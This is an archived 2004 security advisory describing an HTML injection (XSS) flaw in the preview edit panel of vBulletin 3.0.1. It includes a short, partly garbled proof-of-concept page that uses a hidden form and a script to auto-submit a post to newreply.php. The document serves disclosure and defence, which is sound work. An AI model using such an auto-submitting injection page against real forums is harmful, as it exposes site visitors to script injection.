TUCoPS :: Web BBS :: Frequently Exploited :: hack3691.htm

vBulletin HTML Injection Vuln
vBulletin HTML Injection Vuln





 Advisory Name : vBulletin HTML Injection Vulnerability

  Release Date : June 24,2004 

   Application : vBulletin

       Test On : 3.0.1 or others?

        Vendor : Jelsoft(http://www.vbulletin.com/) 

      Discover : Cheng Peng Su(apple_soup_at_msn.com)

     

Intro:

     From vendor's website ,it says that ,vBulletin is a powerful, scalable and 

 fully customizable forums package for your web site. It has been written using

 the Web's quickest-growing scripting language; PHP, and is complimented with a

 highly efficient and ultra fast back-end database engine built using MySQL.



Proof of concept:

     While a user is previewing the post , both newreply.php and newthread.php 

 do sanitize the input in 'Preview',but not Edit-panel,malicious code can be 

 injected thru this flaw.

 

Exploit:

     A page as below can lead visitor to a Preview page which contains XSS code.

    

   -------------------------Remote.html-------------------------

   
action="http://host/newreply.php" name="vbform" method="post" style='visibility:hidden'>
<script> document.all.preview.click(); </script> -----------------------------End----------------------------- Solution: vBulletin Team will release a patch or a fixed version as soon as possible. Contact: Cheng Peng Su apple_soup_at_msn.com Class 1,Senior 2,High school attached to Wuhan University Wuhan,Hubei,China

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH